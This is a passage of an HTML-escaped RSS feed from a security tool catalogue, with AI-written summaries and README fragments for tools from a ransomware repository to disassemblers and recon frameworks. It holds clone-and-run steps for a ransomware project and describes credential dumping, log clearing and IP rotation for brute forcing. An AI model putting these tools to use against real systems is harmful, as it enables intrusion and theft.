&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#f92672"&gt;- Handle with caution 
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;h2 id="-installation-"&gt;💿 Installation 💿&lt;/h2&gt;
&lt;p&gt;git clone &lt;a href="https://github.com/Err0r-ICA/Ransomware"&gt;https://github.com/Err0r-ICA/Ransomware&lt;/a&gt; &lt;br&gt;
cd Ransomware &lt;br&gt;
python3 Ransomware &lt;br&gt;&lt;/p&gt;</description></item><item><title>Ransomware-Tool-Matrix</title><link>https://rainmana.github.io/hackyfeed/tools/bushidouk-ransomware-tool-matrix/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/bushidouk-ransomware-tool-matrix/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; The Ransomware Tool Matrix repository provides an extensive catalog of tools utilized by various ransomware gangs, enabling cybersecurity defenders to identify and mitigate threats effectively. This resource can be leveraged for threat hunting, incident response, and adversary emulation by tracking the tools&amp;rsquo; usage patterns and associated tactics, techniques, and procedures (TTPs). Notable features include categorized lists of tools—including those for credential theft, defense evasion, and networking—as well as links to relevant threat intelligence reports and resources.&lt;/p&gt;</description></item><item><title>rapidscan</title><link>https://rainmana.github.io/hackyfeed/tools/skavngr-rapidscan/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/skavngr-rapidscan/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; RapidScan is a multifaceted web vulnerability scanner that automates the execution of various security scanning tools to efficiently uncover and assess vulnerabilities in web applications. Notable features include its one-step installation, support for multiple tools like nmap and nikto, the ability to correlate results to reduce false positives, and the provision of detailed vulnerability definitions and remediation strategies. The tool is designed to streamline the penetration testing process, saving valuable time while offering comprehensive reporting and future plans for AI-driven tool deployment based on detected issues.&lt;/p&gt;</description></item><item><title>raven</title><link>https://rainmana.github.io/hackyfeed/tools/cycodelabs-raven/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/cycodelabs-raven/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; Raven is a developer security tool designed to enhance the security of software projects by providing capabilities for managing and monitoring secrets, vulnerabilities, and compliance across development environments. Its primary use case is to integrate seamlessly into CI/CD pipelines, ensuring that code remains secure throughout the software development lifecycle. Notable features include real-time detection of security risks, a user-friendly interface, and integration with various popular development tools and platforms.&lt;/p&gt;</description></item><item><title>readpe</title><link>https://rainmana.github.io/hackyfeed/tools/mentebinaria-readpe/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/mentebinaria-readpe/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; readpe is a comprehensive command line toolkit designed for the analysis and manipulation of PE (Portable Executable) binaries across multiple platforms. Its primary use case involves providing developers and security analysts with tools to inspect, modify, and understand the structure of PE files. Notable features include easy installation and building on various operating systems, as well as its background as a successor to the original pev tool, with enhanced functionality integrated into a single repository.&lt;/p&gt;</description></item><item><title>ReC98</title><link>https://rainmana.github.io/hackyfeed/tools/nmlgc-rec98/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/nmlgc-rec98/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; ReC98 is a reverse-engineering project that aims to reconstruct the source code of the first five Touhou Project games originally released for the NEC PC-9801 system. It allows for perfect replications of the original binaries, thus maintaining the integrity of the source while enabling modding and porting efforts by providing a comprehensible codebase. Notable features include the preservation of the original game&amp;rsquo;s mechanics, position independence, and support for community modifications.&lt;/p&gt;</description></item><item><title>Recaf</title><link>https://rainmana.github.io/hackyfeed/tools/col-e-recaf/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/col-e-recaf/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; Recaf is a modern Java bytecode editor designed to simplify the editing and manipulation of Java and Android bytecode by abstracting complex details. Key features include a user-friendly interface, support for multiple decompilers, built-in bytecode compiling and assembling, advanced search capabilities, and tools for code deobfuscation. Additionally, it allows users to script and extend functionality through plugins, and can operate as a command line application for automated processes.&lt;/p&gt;</description></item><item><title>reconmap</title><link>https://rainmana.github.io/hackyfeed/tools/reconmap-reconmap/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/reconmap-reconmap/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; Reconmap is an open-source penetration testing management and automation platform that aids security professionals throughout the engagement lifecycle by efficiently planning, executing, and reporting on security assessments. Its notable features include real-time execution and scheduling of security commands, automated output capture, vulnerability tracking, and the generation of professional reports in multiple formats, all aimed at streamlining workflows and enhancing collaboration among InfoSec teams.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;hr&gt;
&lt;h2 id="readme"&gt;README&lt;/h2&gt;
&lt;div style="text-align: center;"&gt;
&lt;h1&gt;Reconmap&lt;/h1&gt;
&lt;p&gt;&lt;a href="https://bsky.app/profile/netfoe.com"&gt;&lt;img src="https://img.shields.io/badge/dynamic/json?url=https%3A%2F%2Fpublic.api.bsky.app%2Fxrpc%2Fapp.bsky.actor.getProfile%2F%3Factor%3Dnetfoe.com&amp;amp;query=%24.followersCount&amp;amp;style=social&amp;amp;logo=bluesky&amp;amp;label=Follow%20us%20on%20BlueSky&amp;amp;style=flat" alt="Bluesky"&gt;&lt;/a&gt;
&lt;a href="https://www.youtube.com/reconmap"&gt;&lt;img src="https://img.shields.io/youtube/channel/subscribers/UCKJM12YKHqvvATHkdIKopeQ?style=flat&amp;amp;logo=youtube&amp;amp;label=Subscribe%20to%20our%20YouTube%20channel&amp;amp;link=https%3A%2F%2Fwww.youtube.com%2Freconmap" alt="YouTube Channel Subscribers"&gt;&lt;/a&gt;&lt;/p&gt;</description></item><item><title>Reconnoitre</title><link>https://rainmana.github.io/hackyfeed/tools/codingo-reconnoitre/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/codingo-reconnoitre/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; Reconnoitre is a reconnaissance tool designed for automating information gathering and service enumeration tailored for OSCP labs. Its primary use case involves creating a structured directory for storing results, findings, and recommended commands for each target host while offering features like DNS and SNMP sweeps, service scanning, and virtual host discovery using customizable wordlists. The tool emphasizes ease of use and flexibility, allowing users to execute tailored reconnaissance operations efficiently.&lt;/p&gt;</description></item><item><title>ReconPi</title><link>https://rainmana.github.io/hackyfeed/tools/x1mdev-reconpi/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/x1mdev-reconpi/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; ReconPi is a lightweight reconnaissance tool designed for extensive domain analysis and asset discovery using a Raspberry Pi or a VPS. Its primary functionality includes resolving domain names, subdomain enumeration, vulnerability scanning using Nmap, and integrating tools like Nuclei for template-based security assessments. Notable features include automated reporting, Slack notifications, and easy installation through a straightforward script, making it accessible for cyber reconnaissance tasks.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;hr&gt;
&lt;h2 id="readme"&gt;README&lt;/h2&gt;
&lt;h1 id="recon-pi"&gt;Recon Pi&lt;/h1&gt;
&lt;pre tabindex="0"&gt;&lt;code&gt;__________ __________.__ 
\______ \ ____ ____ ____ ____\______ \__|
 | _// __ \_/ ___\/ _ \ / \| ___/ |
 | | \ ___/\ \__( &amp;lt;_&amp;gt; ) | \ | | |
 |____|_ /\___ &amp;gt;\___ &amp;gt;____/|___| /____| |__|
 \/ \/ \/ \/ 
 
			v2.2 - @x1m_martijn 
&lt;/code&gt;&lt;/pre&gt;&lt;p&gt;ReconPi - A lightweight recon tool that performs extensive reconnaissance with the latest tools using a Raspberry Pi.&lt;/p&gt;</description></item><item><title>RecoverPy</title><link>https://rainmana.github.io/hackyfeed/tools/pablolec-recoverpy/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/pablolec-recoverpy/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; RecoverPy is a data recovery tool that scans raw disk partitions to recover deleted files by directly inspecting disk blocks and searching for specific byte patterns. Designed primarily for forensic data recovery, it allows users to navigate adjacent blocks to retrieve fragmented data while ensuring that the entire scanning process is memory-efficient and focused solely on raw data, without attempting any filesystem interpretations. Notably, it facilitates efficient block inspection and content extraction, though success depends on the integrity of the underlying disk blocks.&lt;/p&gt;</description></item><item><title>Red-Baron</title><link>https://rainmana.github.io/hackyfeed/tools/coalfire-research-red-baron/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/coalfire-research-red-baron/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; Red Baron is a Terraform-based framework designed to automate the deployment of secure, resilient, and disposable infrastructure tailored for Red Team operations. This tool offers several pre-compiled custom and third-party Terraform providers to facilitate infrastructure setup on various cloud platforms. Notably, it integrates easily with services like Linode and GoDaddy, enhancing the agility and efficiency of infrastructure management for penetration testing scenarios.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;hr&gt;
&lt;h2 id="readme"&gt;README&lt;/h2&gt;
&lt;p&gt;Latest version of this project is now being maintained here:&lt;/p&gt;</description></item><item><title>Red-Team-Infrastructure-Wiki</title><link>https://rainmana.github.io/hackyfeed/tools/bluscreenofjeff-red-team-infrastructure-wiki/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/bluscreenofjeff-red-team-infrastructure-wiki/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; The Red Team Infrastructure Wiki provides comprehensive guidance for establishing a robust and resilient Red Team infrastructure, aimed at enhancing operational effectiveness in adversarial engagements. Notable features include detailed design considerations for functional segregation, integration of redirectors for obscured communication, and streamlined deployment strategies for phishing and command and control (C2) operations. This resource is particularly valuable for enhancing agility against defensive measures during long-term engagements and during active incident responses.&lt;/p&gt;</description></item><item><title>Red-Teaming-Toolkit</title><link>https://rainmana.github.io/hackyfeed/tools/infosecn1nja-red-teaming-toolkit/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/infosecn1nja-red-teaming-toolkit/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; The Red Teaming Toolkit is an open-source collection of security tools designed to facilitate adversary simulation and enhance threat hunting capabilities. It features various tools organized by categories including reconnaissance, initial access, and lateral movement, providing functionalities such as port scanning, OSINT gathering, and credential dumping. The toolkit serves both security practitioners aiming to test network defenses and those looking to improve detection and prevention mechanisms against potential threats.&lt;/p&gt;</description></item><item><title>redamon</title><link>https://rainmana.github.io/hackyfeed/tools/samugit83-redamon/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/samugit83-redamon/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; RedAmon is an autonomous AI framework designed for seamless cybersecurity operations that integrate reconnaissance, exploitation, and post-exploitation processes into a streamlined pipeline. It stands out by automatically triaging findings, applying code fixes, and generating pull requests in repositories, ensuring human oversight at critical junctures. Its notable features include support for over 38 security tools, integration with major vulnerability scanners, and configurable autonomy to adapt to various security assessment needs.&lt;/p&gt;</description></item><item><title>REDasm</title><link>https://rainmana.github.io/hackyfeed/tools/redasmorg-redasm/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/redasmorg-redasm/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; REDasm is a cross-platform disassembler designed for both hobbyists and professional reverse engineers, featuring a modern codebase and a user-friendly Qt frontend. It supports C++ and Python 3 plugins, multithreaded analysis, and various binary formats including Portable Executable and ELF, while providing capabilities like binary lifting and intermediate language analysis. The underlying architecture, driven by LibREDasm, allows for extensive customization and the addition of new languages.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;hr&gt;
&lt;h2 id="readme"&gt;README&lt;/h2&gt;
&lt;div align="center"&gt;
 &lt;img src="https://raw.githubusercontent.com/REDasmOrg/REDasm/master/artwork/logo_readme_20200905.png"/&gt;
&lt;/div&gt;
&lt;br&gt;
&lt;div align="center"&gt;
 &lt;a href="https://github.com/REDasmOrg/REDasm/actions?query=workflow%3AREDasm-Builds"&gt;
 &lt;img src="https://github.com/REDasmOrg/REDasm/workflows/REDasm-Builds/badge.svg"&gt;
 &lt;/a&gt;
 &lt;a href="https://lgtm.com/projects/g/REDasmOrg/REDasm/context:cpp"&gt;
 &lt;img alt="Language grade: C/C++" src="https://img.shields.io/lgtm/grade/cpp/g/REDasmOrg/REDasm.svg?logo=lgtm&amp;logoWidth=18"&gt;
 &lt;/a&gt;
 &lt;img src="https://img.shields.io/badge/license-GPL3-8e725e.svg?style=flat-square"&gt;
 &lt;a href="https://github.com/ellerbrock/open-source-badges/"&gt;
 &lt;img src="https://badges.frapsoft.com/os/v1/open-source.png?v=103"&gt;
 &lt;/a&gt;
&lt;/div&gt;
&lt;h5 align="center"&gt;
 &lt;a href="#features"&gt;Features&lt;/a&gt;
 &lt;span&gt; | &lt;/span&gt;
 &lt;a href="https://github.com/REDasmOrg/REDasm/blob/master/COMPILE.md"&gt;Compile&lt;/a&gt;
 &lt;span&gt; | &lt;/span&gt;
 &lt;a href="https://www.reddit.com/r/REDasm"&gt;Reddit&lt;/a&gt;
 &lt;span&gt; | &lt;/span&gt;
 &lt;a href="https://twitter.com/re_dasm"&gt;Twitter&lt;/a&gt;
 &lt;span&gt; | &lt;/span&gt;
 &lt;a href="https://t.me/REDasmDisassembler"&gt;Telegram&lt;/a&gt;
&lt;/h5&gt;
&lt;hr&gt;
REDasm is a cross platform disassembler with a modern codebase useful 
from the hobbyist to the professional reverse engineer.&lt;br&gt;
All features are provided by &lt;a href="https://github.com/REDasmOrg/REDasm-Library/tree/master"&gt;LibREDasm&lt;/a&gt; which loads
plugins developed in C, C++ and Python3 (you can also support new languages if you want!) and an user friendly Qt frontend.&lt;br&gt;
LibREDasm also provides a plain C API for maximum ABI compatibility along with a C++17 core.&lt;br&gt;
&lt;br&gt;
&lt;p align="right"&gt;&lt;i&gt;Tested on Windows and Linux.&lt;/i&gt;&lt;/p&gt;</description></item><item><title>REDRIVER2</title><link>https://rainmana.github.io/hackyfeed/tools/opendriver2-redriver2/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/opendriver2-redriver2/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; REDRIVER2 is a reverse-engineered reimplementation of the original game, translating MIPS code back to C without emulation, and significantly enhancing it beyond the original PlayStation version. The tool supports modding with replacement of textures and models, runs on multiple platforms including Windows and Linux, and integrates a custom porting layer based on the Psy-X emulator. It utilizes advanced reverse engineering methods, including debugging symbols and semi-automatic decompilation techniques to achieve a fully playable game experience.&lt;/p&gt;</description></item><item><title>redsnarf</title><link>https://rainmana.github.io/hackyfeed/tools/nccgroup-redsnarf/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/nccgroup-redsnarf/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; RedSnarf is a penetration testing and red team tool designed for the extraction of hashes and credentials from Windows environments, including workstations, servers, and domain controllers, utilizing operationally safe techniques. Key features include the retrieval of local SAM hashes, enumeration of users with elevated privileges, and capabilities for hash spraying, LSASS dumps, and remote management functions like enabling/disabling RDP and clearing event logs. The tool focuses on efficient credential collection and strengthening post-exploitation analysis while maintaining a low profile during operations.&lt;/p&gt;</description></item><item><title>RedTeam-Tools</title><link>https://rainmana.github.io/hackyfeed/tools/a-poc-redteam-tools/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/a-poc-redteam-tools/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; RedTeam-Tools is a comprehensive repository containing over 150 tools and resources specifically designed for red teaming activities, encompassing both targeted tools and general-purpose utilities adaptable for offensive operations. Notable features include a variety of specialized tips for advanced red team techniques, as well as tools for reconnaissance, exploitation, and post-exploitation, catering to a wide range of attack vectors and methodologies. This collection serves as both a practical toolkit and an educational resource for those engaged in offensive cybersecurity practices.&lt;/p&gt;</description></item><item><title>RedTeaming-Tactics-and-Techniques</title><link>https://rainmana.github.io/hackyfeed/tools/mantvydasb-redteaming-tactics-and-techniques/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/mantvydasb-redteaming-tactics-and-techniques/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; This repository contains personal notes focused on red teaming and offensive security, emphasizing practical experiments with various penetration testing techniques and tools in a controlled lab environment. It covers a range of methodologies, including code execution, defense evasion, and lateral movement, while aiming to enhance understanding of cyber attacks and malware development. Notable features include a commitment to referencing other researchers&amp;rsquo; work and a critical approach to self-learning through experimentation and documentation.&lt;/p&gt;</description></item><item><title>reentrancy-attacks</title><link>https://rainmana.github.io/hackyfeed/tools/pcaversaccio-reentrancy-attacks/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/pcaversaccio-reentrancy-attacks/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; The &amp;ldquo;reentrancy-attacks&amp;rdquo; repository provides a comprehensive historical collection of reentrancy attack incidents on smart contracts. It categorizes various types of attacks, including single-function and cross-chain reentrancy, and includes detailed timelines, victim contracts, and exploit transactions for notable cases. This tool serves as a reference for understanding and analyzing reentrancy vulnerabilities in blockchain applications.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;hr&gt;
&lt;h2 id="readme"&gt;README&lt;/h2&gt;
&lt;h1 id="-a-historical-collection-of-reentrancy-attacks"&gt;⚔️ A Historical Collection of Reentrancy Attacks&lt;/h1&gt;
&lt;p&gt;&lt;a href="https://github.com/pcaversaccio/reentrancy-attacks/actions/workflows/checks.yml"&gt;&lt;img src="https://github.com/pcaversaccio/reentrancy-attacks/actions/workflows/checks.yml/badge.svg" alt="👮‍♂️ Sanity checks"&gt;&lt;/a&gt;
&lt;a href="https://www.gnu.org/licenses/agpl-3.0"&gt;&lt;img src="https://img.shields.io/badge/License-AGPL--3.0--only-blue" alt="License: AGPL-3.0-only"&gt;&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;📌 Definition of a Reentrancy Attack&lt;/strong&gt;&lt;/p&gt;</description></item><item><title>refinery</title><link>https://rainmana.github.io/hackyfeed/tools/binref-refinery/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/binref-refinery/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; Binary Refinery is a command-line toolkit designed for the transformation of binary data, focusing on malware triage analysis through various scripts that handle tasks like compression and encryption. It enables users to create flexible processing pipelines by chaining scripts with the piping operator. Key features include the ability to read from stdin and write to stdout, extensive documentation accessible via command-line help, and an emphasis on modular units that perform singular tasks efficiently.&lt;/p&gt;</description></item><item><title>reFlutter</title><link>https://rainmana.github.io/hackyfeed/tools/impact-i-reflutter/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/impact-i-reflutter/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; reFlutter is a framework designed for the reverse engineering of Flutter applications by utilizing a modified version of the Flutter library, enabling dynamic analysis and convenient app repacking. Notable features include traffic monitoring and interception capabilities through a patched &lt;code&gt;socket.cc&lt;/code&gt;, modifications to display code structure information, and support for manual code changes via a custom &lt;code&gt;Dockerfile&lt;/code&gt;. This tool allows users to bypass certain certificate pinning implementations and does not require root access for Android devices, streamlining the app analysis process.&lt;/p&gt;</description></item><item><title>reko</title><link>https://rainmana.github.io/hackyfeed/tools/uxmal-reko/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/uxmal-reko/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; Reko is a general-purpose decompiler designed to analyze machine code binaries. It supports various processor architectures and executable formats, providing users with command-line, Windows GUI, and ASP.NET front ends for inputting individual binaries or project files. Notable features include a core decompiler engine that facilitates minimal user intervention during decompilation and extensive support for different file formats, all maintained under the GNU General Public License.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;hr&gt;
&lt;h2 id="readme"&gt;README&lt;/h2&gt;
&lt;h1 id="reko---a-general-purpose-decompiler"&gt;reko - a general purpose decompiler.&lt;/h1&gt;
&lt;p&gt;&lt;a href="https://cirrus-ci.com/github/uxmal/reko"&gt;&lt;img src="https://api.cirrus-ci.com/github/uxmal/reko.svg?branch=master" alt="Cirrus CI Build Status"&gt;&lt;/a&gt;
&lt;a href="https://github.com/uxmal/reko/actions/workflows/reko.yml"&gt;&lt;img src="https://github.com/uxmal/reko/workflows/Reko/badge.svg" alt="GitHub workflow status"&gt;&lt;/a&gt;
&lt;a href="https://discord.gg/9PMWVxEjqr"&gt;&lt;img src="https://img.shields.io/static/v1?link=https://discord.gg/9PMWVxEjqr&amp;amp;message=Join%20Discord&amp;amp;logo=discord&amp;amp;style=flat&amp;amp;color=107090&amp;amp;labelColor=5E5E5E&amp;amp;label=&amp;amp;logoColor=white" alt="Join us on Discord"&gt;&lt;/a&gt;
&lt;a href="https://gitter.im/uxmal/reko?utm_source=badge&amp;amp;utm_medium=badge&amp;amp;utm_campaign=pr-badge&amp;amp;utm_content=badge"&gt;&lt;img src="https://badges.gitter.im/uxmal/reko.svg" alt="Join the chat at https://gitter.im/uxmal/reko"&gt;&lt;/a&gt;&lt;/p&gt;</description></item><item><title>Reloaded-II</title><link>https://rainmana.github.io/hackyfeed/tools/reloaded-project-reloaded-ii/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/reloaded-project-reloaded-ii/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; Reloaded II is a universal mod loader and mod management framework developed in C#, designed for use with x86 and x64 native games. Its primary use case is enabling DLL injection for modding capabilities, offering a comprehensive toolkit for modding various games. Notable features include full open-source access and a focus on extensibility for user-contributed enhancements and documentation.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;hr&gt;
&lt;h2 id="readme"&gt;README&lt;/h2&gt;
&lt;div align="center"&gt;
	&lt;h1&gt;Reloaded II&lt;/h1&gt;
	&lt;img src="./docs/Images/Reloaded/Reloaded Logo.png" width="150" align="center" /&gt;
	&lt;br/&gt; &lt;br/&gt;
	&lt;strong&gt;Nothing else matters.&lt;/strong&gt;
	&lt;br/&gt;
 Universal, C# based mod loader.
 &lt;br/&gt;
 Works with anything X86, X64.
&lt;/div&gt;
&lt;h2 id="introduction"&gt;Introduction&lt;/h2&gt;
&lt;p&gt;&lt;strong&gt;[Reloaded II]&lt;/strong&gt; is a universal DLL injection based Mod Loader and Mod Management Framework.&lt;/p&gt;</description></item><item><title>remote-method-guesser</title><link>https://rainmana.github.io/hackyfeed/tools/qtc-de-remote-method-guesser/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/qtc-de-remote-method-guesser/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; The &lt;em&gt;remote-method-guesser&lt;/em&gt; (rmg) is a Java RMI vulnerability scanner designed to identify and verify common security vulnerabilities on Java RMI endpoints. It features practical examples, including servers that facilitate testing for standard RMI services, SSRF attacks, and Spring Remoting integration, making it a valuable tool for penetration testers and security researchers. The tool&amp;rsquo;s compatibility with Docker allows for efficient setup and execution of security assessments in isolated environments.&lt;/p&gt;</description></item><item><title>rengine</title><link>https://rainmana.github.io/hackyfeed/tools/yogeshojha-rengine/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/yogeshojha-rengine/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; reNgine is a comprehensive web reconnaissance and vulnerability scanning tool aimed at security professionals, penetration testers, and bug bounty hunters. It features a highly configurable engine, data correlation capabilities, continuous monitoring, and a database-backed reconnaissance system, with the latest update including enhancements like a bounty hub integration, subdomain enumeration tools, and customizable reporting templates. This tool streamlines the reconnaissance process, enhancing efficiency and effectiveness in identifying vulnerabilities across web applications.&lt;/p&gt;</description></item><item><title>requests-ip-rotator</title><link>https://rainmana.github.io/hackyfeed/tools/ge0rg3-requests-ip-rotator/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/ge0rg3-requests-ip-rotator/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; requests-ip-rotator is a Python library designed to leverage AWS API Gateway&amp;rsquo;s extensive IP pool to generate numerous unique IP addresses for web scraping and brute forcing, enabling users to circumvent IP-based rate limits. The tool automatically randomizes the X-Forwarded-For headers to obscure the client&amp;rsquo;s true IP while allowing for easy integration with the requests library. Notably, it offers both manual and automatic gateway management methods for user convenience, along with cost-effective usage under AWS&amp;rsquo;s free tier.&lt;/p&gt;</description></item><item><title>resolvers</title><link>https://rainmana.github.io/hackyfeed/tools/trickest-resolvers/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/trickest-resolvers/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; Resolvers is an extensive repository of validated DNS resolvers designed for use in DNS enumeration tasks, catering primarily to security professionals and penetration testers. The tool offers various lists, including a simple resolver list, an extended version with detailed metadata about each resolver, and a selection of trusted resolvers from reputable organizations like Cloudflare and Google. Notably, it employs a robust validation process using multiple instances of dnsvalidator to ensure the reliability of the resolver data, which is continuously updated through community contributions.&lt;/p&gt;</description></item><item><title>Resources-for-Beginner-Bug-Bounty-Hunters</title><link>https://rainmana.github.io/hackyfeed/tools/nahamsec-resources-for-beginner-bug-bounty-hunters/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/nahamsec-resources-for-beginner-bug-bounty-hunters/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; The &amp;ldquo;Resources-for-Beginner-Bug-Bounty-Hunters&amp;rdquo; repository serves as a comprehensive guide for individuals entering the realm of web hacking and bug bounty hunting. It features a curated selection of tools, tips, and resources aimed at enhancing the skills of both novice and experienced hunters, with notable sections on vulnerability types, testing environments, and coding resources. Additionally, the repository includes links to educational courses and community engagement platforms to foster learning and collaboration.&lt;/p&gt;</description></item><item><title>ret-sync</title><link>https://rainmana.github.io/hackyfeed/tools/bootleg-ret-sync/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/bootleg-ret-sync/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; &lt;strong&gt;ret-sync&lt;/strong&gt; is a synchronization tool designed for reverse engineering, enabling the integration of various debugging environments (WinDbg, GDB, LLDB, etc.) with static analysis disassemblers (IDA, Ghidra, Binary Ninja). Its primary use case is to facilitate a seamless analysis workflow by synchronizing debugger states with disassembler views, allowing for real-time insights during dynamic analysis while providing the broader context from static analysis. Notable features include on-the-fly address rebasing, support for multiple simultaneous sessions across different systems, and the ability to pass contextual information between debug and disassembly tools.&lt;/p&gt;</description></item><item><title>retoolkit</title><link>https://rainmana.github.io/hackyfeed/tools/mentebinaria-retoolkit/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/mentebinaria-retoolkit/</guid><description>&lt;blockquote&gt;
